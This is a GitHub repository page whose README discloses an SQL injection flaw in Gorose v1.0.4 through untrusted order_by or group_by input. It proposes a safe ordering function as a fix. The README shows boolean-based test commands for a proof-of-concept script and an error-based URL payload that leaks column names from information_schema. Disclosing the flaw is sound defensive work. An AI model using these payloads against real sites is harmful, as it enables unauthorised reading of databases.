Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md
dal.go

README.md

Gorose v1.0.4 has SQL Injection when the order_by or group_by parameter can be controlled.

then all of the three lines of code can work

go run dal.go 'if(1=1,id,username)'
go run dal.go 'if(1=2,id,username)'
go run dal.go 'id'

In website, attacker can execute SQL like:

http://x.com?order_by=,(extractvalue(1,concat(0x3a,substring(
    (select group_concat(column_name) from
information_schema.columns where table_name like 'xxx'),1,30) )))

or other way like:
http://www.securityidiots.com/Web-Pentest/SQL-Injection/group-by-and-order-by-sql-injection.html

If we don't remind developers the potential risks of using untrusted input at order_by / group_by ,sql injection may occur.

developers may think the instructions are safe and sure of security. Most of them think the use of orm is 100% guard against sql injection.

So can we add a fun like 'order_by_safe' which receive field only in models.

You can’t perform that action at this time.